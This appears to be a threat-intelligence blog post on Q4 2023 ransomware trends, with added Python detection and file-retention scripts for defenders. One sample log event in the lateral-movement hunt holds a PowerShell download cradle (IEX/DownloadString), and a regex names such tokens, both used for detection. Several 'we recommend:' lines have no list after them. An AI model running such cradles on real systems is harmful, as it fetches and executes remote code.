In the fourth quarter of 2023 (Q4 2023), 80% more organizations were hit by ransomware attacks than in Q4 2022. It is an alarming statistic, and an emergency flare signaling the growing threat cybercriminals pose to businesses of all sizes.
November contributed heavily to the surge, at least partly because the Citrix Bleed vulnerability was being exploited at scale. November also brought a new and aggressive extortion tactic from the ransomware group "ALPHV," which turned to the US Securities and Exchange Commission (SEC) to pressure its targets.
Every problem leaves a lesson, which is why we’re about to dig deep into these developments. The light at the end of the tunnel is a clearer view of the evolving ransomware landscape, and attacker strategies.
In Q4 2023, ransomware was delivered primarily through vulnerabilities in public-facing applications and through phishing. The dramatic growth in ransomware attacks can be attributed to several factors. First, attackers had easy access to ransomware-as-a-service (RaaS) tooling. They were also, almost certainly, driven by an attractive risk-reward ratio: few attackers are caught and held accountable for their attacks.
Figure 1: Number of compromised entities listed on data-leak sites by month in 2023
November 2023 stood out as particularly busy, with the second-highest number of compromised entities of the year. The most likely reason is the number of threat groups that rushed to exploit the Citrix Bleed vulnerability (CVE-2023-4966 in Citrix NetScaler ADC and NetScaler Gateway) to deliver ransomware. Historically, threat groups have been quick to adopt newly disclosed, high-severity vulnerabilities. Citrix Bleed was especially appealing because it leaked session tokens from the appliance's memory: an attacker could replay a stolen token and take over an already-authenticated session, sidestepping multifactor authentication (MFA) because the legitimate user had already completed it. That is why prioritizing security patches and managing vulnerabilities effectively is crucial. In this case patching alone was not enough, because tokens stolen before the fix remain valid until the corresponding sessions are terminated. During Q4, many threat actors took advantage of critical vulnerabilities to distribute ransomware.
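A detection check a defender can run over gateway session logs, as an added example that is not part of the original post: the observable that token theft of this kind leaves behind is an already-authenticated session being used from a different source address, often by a different client, with no new login in between. The record layout, field names and sample lines below are constructed for illustration and are not a real NetScaler log format.

```python
"""Flag authenticated-session reuse from a new network location.

Constructed example: a stolen session token replayed by an attacker keeps
the victim's session id but arrives from a different source IP, and
usually from a different client string. A user who re-authenticates from
a new location gets a new session id instead, so an unchanged id across
IPs is the signal worth alerting on.
"""
from dataclasses import dataclass
from datetime import datetime

# Constructed sample records: ts|session_id|user|src_ip|user_agent
SAMPLE_LOG = [
    "2023-11-03T08:00:00|sess-a1|alice|203.0.113.10|Citrix Workspace",
    "2023-11-03T08:05:00|sess-a1|alice|203.0.113.10|Citrix Workspace",
    # same session id four minutes later, new IP, scripted client
    "2023-11-03T08:09:00|sess-a1|alice|198.51.100.77|python-requests/2.31",
    "2023-11-03T09:00:00|sess-b2|bob|192.0.2.5|Citrix Workspace",
    # same client, new IP, hours later: roaming or hijack, lower confidence
    "2023-11-03T17:00:00|sess-b2|bob|192.0.2.9|Citrix Workspace",
]


@dataclass(frozen=True)
class SessionEvent:
    ts: datetime
    session_id: str
    user: str
    src_ip: str
    user_agent: str


def parse_events(lines):
    """Parse the constructed pipe-separated records, oldest first."""
    events = []
    for line in lines:
        ts, sid, user, ip, ua = line.strip().split("|")
        events.append(SessionEvent(datetime.fromisoformat(ts), sid, user, ip, ua))
    return sorted(events, key=lambda e: e.ts)


def find_session_reuse(events):
    """Return one alert per use of a session from an IP other than the one
    it was last seen from. `agent_changed` is the stronger signal: a stolen
    token replayed by a script rarely reproduces the victim's client."""
    last_seen = {}  # session_id -> most recent SessionEvent
    alerts = []
    for e in events:
        prev = last_seen.get(e.session_id)
        if prev is not None and e.src_ip != prev.src_ip:
            alerts.append({
                "session_id": e.session_id,
                "user": e.user,
                "previous_ip": prev.src_ip,
                "new_ip": e.src_ip,
                "agent_changed": e.user_agent != prev.user_agent,
                "seconds_since_last_use": int((e.ts - prev.ts).total_seconds()),
            })
        last_seen[e.session_id] = e
    return alerts


if __name__ == "__main__":
    for alert in find_session_reuse(parse_events(SAMPLE_LOG)):
        print(alert)
```

Tune the rule to the environment: if the gateway logs a client certificate or device ID, include it in the comparison, and treat an IP change combined with a client change as high priority. A hit on a session created before the appliance was patched is a reason to terminate that session rather than just watch it.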
The Q4 2023 sectoral pattern of targeting remained largely consistent with the previous quarter: Manufacturing; professional, scientific, and technical services; and construction bore the brunt of the impact. Knowing which sectors are being targeted—and in which locations—can help drive proactive security measures to best prepare for a potential attack.
Regionally, the United States, the United Kingdom and Canada experienced the majority of documented ransomware attacks, which stands to reason: they are appealing because of their thriving economies, English-speaking populations, and ability to pay large sums to restore compromised systems. They have become prime targets for cybercrime groups that recognize the potential for substantial ransom payments.
Figure 2: Number of compromised entities listed on data-leak sites by threat group in Q4 2023
The number of ransomware groups only continues to expand, and the availability of RaaS continues to attract operators with varying skill levels. So we can expect the increase in ransomware attacks that began in 2023 to persist throughout 2024. Implementing proactive security measures will be essential for organizations of all sizes.
Cyber-threat actors constantly find innovative ways to bypass the latest defensive systems. (Check out our recap of cyber-threat techniques in Q4.) They’re exploiting vulnerabilities that have not been addressed and/or targeting unsuspecting users. In the final stretch of 2023, we saw not only more attacks from certain groups, but also new tactics and techniques.
For security defenders it is a dynamic cat-and-mouse game, and their approach must stay one step ahead of threat actors' attack strategies. Organizations and individuals should continuously update their defenses, stay vigilant, and keep ongoing education and awareness at the forefront to counter evolving and increasingly aggressive cyber threats. Below are specific mitigation recommendations, based on Q4 threats that show no sign of fading.
The ransomware group ALPHV (aka "BlackCat") added an extra layer of aggression to its Q4 extortion tactics: after an attack, the group reported its own victim to the SEC for not disclosing the breach, adding intimidation and pressure to meet its demands. This hyper-aggression is a response to growing resistance to paying ransom demands. Involving the SEC (or other regulatory bodies) intensifies the consequences and public scrutiny for compromised entities.
ALPHV’s new tactic emphasizes the need for heightened cybersecurity measures, and preparedness for other new or evolving tactics. Security teams would also benefit from performing ongoing reviews and updates of policies, to better respond to aggressive ransomware tactics.
Also, because ALPHV is known to gain initial access to organizations through social engineering and to move laterally in a network via the Remote Desktop Protocol (RDP), we recommend:
Figure 3: Screenshot of ALPHV’s post reporting an organization to the SEC
In Q4, we saw a significant increase in the number of compromised entities listed by the ransomware group "Play" (aka Playcrypt). The group tends to gain initial access by exploiting known vulnerabilities in public-facing products such as FortiOS, practices double extortion, and takes a discreet-but-proactive approach in attacks: instead of providing direct payment instructions in ransom notes, it instructs victims to contact the group via email.
Requesting payment in cryptocurrency, Play members specify wallet addresses where the ransom should be sent. If a target doesn’t play ball, the group escalates the situation by threatening to publicly disclose the exfiltrated data on their designated leak site.
Play likes to exploit flaws in public-facing applications to gain initial access and then abuses highly privileged administrator accounts; with that in mind, we recommend:
Following the fall of “NoEscape” and ALPHV’s temporary outage, the “LockBit” group saw a chance to recruit members from those notorious ransomware operations. LockBitSupp, the group’s public representative, offered affiliates the use of LockBit’s data-leak site and negotiation panel. It’s unclear whether the recruitment scheme worked, but at least one organization whose compromise was linked to ALPHV ended up being named on LockBit’s leak site.
One thing that is clear: LockBit—the most active group throughout 2023—is firmly determined to not only maintain but enhance operations. By expanding membership, LockBit would increase operational capacity, which means the group has no intention of slowing down or pausing activities. Individuals and organizations should remain vigilant and fortify their cybersecurity defenses in light of the innovation and determination LockBit is showing.
LockBit and its affiliates have been seen moving laterally through victims' systems with familiar built-in tools, such as Windows PowerShell and Server Message Block (SMB), so we recommend:
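One way to hunt for the lateral movement described for ALPHV (RDP) and for LockBit (PowerShell and SMB), as an added example rather than ReliaQuest's own detection logic: correlate Windows Security 4624 logons of type 10 (RemoteInteractive, i.e. RDP), 5140 access to administrative shares, and PowerShell Operational 4104 script blocks by source address. The event records are constructed and their field names are simplified from the Windows event schema; the thresholds are assumptions to tune per environment.

```python
"""Spot RDP, admin-share and PowerShell lateral movement in Windows events.

Constructed example. Event IDs follow the Windows Security log (4624 logon,
LogonType 10 = RemoteInteractive/RDP; 5140 network share accessed) and the
PowerShell Operational log (4104 script block). The records are made up:
one workstation fans out to several servers in minutes, then a download
cradle runs on one of them; a helpdesk user does ordinary work.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    {"ts": "2023-12-01T02:10:00", "id": 4624, "host": "SRV-FILE01", "user": "CORP\\jdoe", "logon_type": 10, "src_ip": "10.0.5.23"},
    {"ts": "2023-12-01T02:12:00", "id": 4624, "host": "SRV-SQL02", "user": "CORP\\jdoe", "logon_type": 10, "src_ip": "10.0.5.23"},
    {"ts": "2023-12-01T02:13:00", "id": 5140, "host": "SRV-DC01", "user": "CORP\\jdoe", "share": "\\\\*\\ADMIN$", "src_ip": "10.0.5.23"},
    {"ts": "2023-12-01T02:14:00", "id": 4624, "host": "SRV-APP03", "user": "CORP\\jdoe", "logon_type": 10, "src_ip": "10.0.5.23"},
    {"ts": "2023-12-01T02:15:00", "id": 4104, "host": "SRV-SQL02", "user": "CORP\\jdoe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.5.23/a.ps1')"},
    {"ts": "2023-12-01T09:00:00", "id": 4624, "host": "SRV-FILE01", "user": "CORP\\helpdesk", "logon_type": 10, "src_ip": "10.0.9.4"},
    {"ts": "2023-12-01T09:30:00", "id": 4624, "host": "SRV-FILE01", "user": "CORP\\helpdesk", "logon_type": 2, "src_ip": "-"},
    {"ts": "2023-12-01T09:40:00", "id": 4104, "host": "SRV-FILE01", "user": "CORP\\helpdesk",
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
]

# \\<server>\ADMIN$, C$ or IPC$: the shares used to drop and run payloads.
ADMIN_SHARE = re.compile(r"\\\\[^\\]+\\(ADMIN\$|C\$|IPC\$)$", re.IGNORECASE)
# Encoded commands and download cradles; extend with your own tradecraft list.
SUSPICIOUS_PS = re.compile(
    r"(-enc(odedcommand)?\b|IEX\b|Invoke-Expression|DownloadString|FromBase64String)",
    re.IGNORECASE,
)


def fan_out_sources(events, window=timedelta(minutes=30), min_targets=3):
    """Return {src_ip: sorted target hosts} for sources that reached at
    least `min_targets` distinct hosts over RDP or admin shares within any
    `window`-long span. One admin reaching one box is noise; one source
    reaching many boxes in minutes is how ransomware operators move."""
    touches = defaultdict(list)  # src_ip -> [(ts, target host)]
    for e in events:
        ts = datetime.fromisoformat(e["ts"])
        if e["id"] == 4624 and e.get("logon_type") == 10:
            touches[e["src_ip"]].append((ts, e["host"]))
        elif e["id"] == 5140 and ADMIN_SHARE.match(e.get("share", "")):
            touches[e["src_ip"]].append((ts, e["host"]))
    hits = {}
    for src, items in touches.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            hosts = {h for t, h in items[i:] if t - t0 <= window}
            if len(hosts) >= min_targets:
                hits[src] = sorted(hosts)
                break
    return hits


def suspicious_script_blocks(events):
    """Return (host, user, matched token) for 4104 script blocks that carry
    an encoded command or a download cradle."""
    out = []
    for e in events:
        if e["id"] != 4104:
            continue
        m = SUSPICIOUS_PS.search(e["script"])
        if m:
            out.append((e["host"], e["user"], m.group(0)))
    return out


if __name__ == "__main__":
    print("fan-out sources:", fan_out_sources(SAMPLE_EVENTS))
    print("script blocks:", suspicious_script_blocks(SAMPLE_EVENTS))
```

Script block logging (4104) and share-access auditing (5140) are not on by default, so the second half of this check only works where those policies are enabled; enabling them is part of the recommendation.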
The 2023 boost in the number of ransomware victims is a trend that looks set to continue. Here’s what we’re also anticipating:
LockBit has been exploiting vulnerabilities in NetScaler, a widely used networking technology, to target high-value organizations (banks, governments, law firms, etc.). That focus suggests LockBit aims to maximize its impact and the associated potential for large ransom payments; such organizations often hold sensitive (read: valuable) data. Given the profitability and success of these attacks, LockBit will probably continue its NetScaler exploitation and industry focus. To mitigate the risk, organizations should patch and update their NetScaler appliances and, because Citrix Bleed exploitation leaves behind session tokens that stay valid after the patch, terminate all active and persistent sessions once the fix is applied.
In case you are a complete stranger to cyber threat intelligence, "Clop" is a group known for its large-scale ransomware attacks, managed file transfer (MFT) vulnerability exploits, and zero-day exploitation. To say the group has been prolific is an understatement. But following the last spate of attacks in its MOVEit campaign in mid-September 2023, Clop's activity tapered off; the group named 95.3% fewer victims in Q4 2023 than in the previous quarter.
This tapering after an activity surge has been seen with Clop before, following a 2020–21 campaign that abused several zero-days. In other words, Clop could very well make a comeback. To guard against similar campaigns, organizations should minimize exposure on MFT sites by limiting content storage duration to about 5 or 10 business days—after all, these services are primarily intended for file transfers rather than long-term storage.
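A way to enforce that retention window on an MFT drop directory, as an added example and not ReliaQuest's or any MFT vendor's code: it ages each file in business days (weekends excluded), returns the files past the limit, and deletes only when asked, so it can run as a dry run first. The sample directory is constructed inside the block; a scheduled job would point `files_to_purge` at the real transfer root instead.

```python
"""Purge managed-file-transfer content older than N business days.

Constructed example. Files waiting on an MFT server are exactly what an
attacker exfiltrates when the service is compromised, so the less that is
sitting there, the less a breach exposes. Business-day ageing keeps a
Friday upload from expiring over a weekend. Holidays are not modelled;
add a holiday set if the policy needs one.
"""
import os
import tempfile
from datetime import date, datetime, timedelta
from pathlib import Path


def business_days_between(start: date, end: date) -> int:
    """Count Monday-to-Friday days in the interval (start, end]."""
    days = 0
    d = start
    while d < end:
        d += timedelta(days=1)
        if d.weekday() < 5:
            days += 1
    return days


def files_to_purge(root, max_business_days, now=None):
    """Return files under `root` last modified more than `max_business_days`
    business days before `now`, sorted by path."""
    now = now or datetime.now()
    expired = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        mtime = datetime.fromtimestamp(path.stat().st_mtime)
        if business_days_between(mtime.date(), now.date()) > max_business_days:
            expired.append(path)
    return sorted(expired, key=str)


def purge(root, max_business_days, delete=False, now=None):
    """Dry run by default; deletes the expired files only when delete=True."""
    expired = files_to_purge(root, max_business_days, now)
    if delete:
        for p in expired:
            p.unlink()
    return expired


def make_sample_tree(root, now):
    """Constructed sample: three transfers of different ages."""
    ages_in_calendar_days = {"fresh.zip": 1, "last_week.csv": 9, "stale.pdf": 30}
    for name, days in ages_in_calendar_days.items():
        p = Path(root) / name
        p.write_bytes(b"sample transfer content")
        ts = (now - timedelta(days=days)).timestamp()
        os.utime(p, (ts, ts))


def run_demo():
    """Build the sample tree at a fixed Friday and apply 5- and 10-day limits."""
    now = datetime(2023, 12, 15, 12, 0)  # a Friday, constructed reference time
    with tempfile.TemporaryDirectory() as root:
        make_sample_tree(root, now)
        five = [p.name for p in files_to_purge(root, 5, now)]
        ten = [p.name for p in files_to_purge(root, 10, now)]
        removed = [p.name for p in purge(root, 5, delete=True, now=now)]
        remaining = sorted(os.listdir(root))
    return {"five": five, "ten": ten, "removed": removed, "remaining": remaining}


if __name__ == "__main__":
    print(run_demo())
```

Run it first with `delete=False` from the scheduler and review what it would remove; once the output matches the policy, switch to `delete=True` and log every path removed, since the deletion record is what an investigator will want later.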
Within just seven months, the NoEscape group listed 145 compromised organizations on its data-leak site. In Q4 2023, the group named 24.6% more compromised entities than in the previous quarter. But, all stats aside, NoEscape hasn’t reported any newly compromised entities since December 4, 2023.
Affiliates of NoEscape allege that the group conducted an exit scam, walking away with ransom payments worth millions of dollars. The group took down its data-leak site and has lost the trust of its affiliates. But again, it is reasonable to anticipate another iteration of the group at some point, given that NoEscape itself emerged as a rebrand of "Avaddon" and given its success with multi-extortion tactics.
NoEscape affiliates are known to deliver the ransomware through various means, but the most prominent is malicious file downloads and infected email attachments. Organizations should regularly update antivirus software and conduct security awareness training for employees.
Interested in learning more about the cyber-threat landscape in 2024? Our Cyber-threat Predictions blog offers a comprehensive analysis of various topics, including the risks associated with the abuse of artificial intelligence, the potential impacts of geopolitical tension, evolving trends in initial access and ransomware, and best practices for preparing against a wide range of cyber threats.